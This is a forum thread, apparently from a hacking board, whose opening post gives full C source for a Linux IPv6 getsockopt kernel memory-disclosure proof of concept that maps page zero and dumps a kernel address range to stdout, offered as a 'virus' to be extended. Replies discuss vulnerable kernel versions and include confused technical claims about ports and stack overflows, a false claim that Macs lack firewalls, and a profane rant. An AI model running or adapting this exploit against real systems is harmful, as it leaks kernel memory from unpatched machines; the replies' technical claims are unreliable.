Who said linux couldn't get virii? (works on mac also)

Code:

#include <sys/mman.h>
#include <netinet/in.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#define HOPOPT_OFFSET 8
#define INIADDR 0xc0100000
#define ENDADDR  0xd0000000

unsigned int i;

int main(int argc, char *argv[]) {
  int s;
  unsigned int optlen;
  void *ptr;
  char value[10240];
  char text[12];
  fprintf(stderr,"Linux Ipv6_getsockopt_sticky vuln\n"
                 "Works on mac too.\n"
                 "Dumping %p - %p to stdout\n",INIADDR,ENDADDR);
  s = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP);
  setsockopt(s, IPPROTO_IPV6, IPV6_2292PKTOPTIONS, (void *)NULL, 0);
  ptr = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
  if (ptr != NULL) {
      perror("mmap");
      exit(-1);
  }
  memset(ptr,0,4096);
  ptr=(char *)((char *)ptr+HOPOPT_OFFSET);
  i=INIADDR;
  while(i<ENDADDR) {
      *((int *)ptr)=i;
      optlen=10240;
      getsockopt(s, IPPROTO_IPV6, IPV6_DSTOPTS, (void *)value, &optlen);
      if(optlen>0) {
          sprintf(text,"\n%08x:",i);
          write(1,text,strlen(text));
          write(1,value,optlen);
          i=i+optlen;
      } else {
          i=i+4;
      }
  }
  return 0;
}

Just a PoC can be much further extended if someone cared to do so.

 

Doesn't that only affect pre-2.6.20 kernels?

 

hmm does this create a buffer overflow by opening port 4096 then spamming it..?

 

IT works up to 2.6.20.2.

No, it spams a null pointer which overflows stack.

 

I have 2.6.20.6! I win! ;D

I will test this out anyway though. nice job if you made this.

 

Most distros use older kernels it will affect most webservers as they have a platform running on them from when it was installed on the server and rarely update.

 

but wouldent this be prvented on a mac if you had a firwall on on a mac, because you could not conect to the port....

 

Macs dont have firewalls, Macs are an over advertised ripoff of linux/BSD, their claim of fame is microsoft rips their ideas off, when their own ideas aren't even fucking theirs. Including a Different desktop type which is a pile of shit that freezes all the time. Become familiar with the clover shift period key, as you will be using it alot. You have to trick a mac into getting it to do what you want.

 

Any OS that cannot get a virus is a lame and limiting OS.
Thanks for the code though. I enjoy reading simple code for interesting things.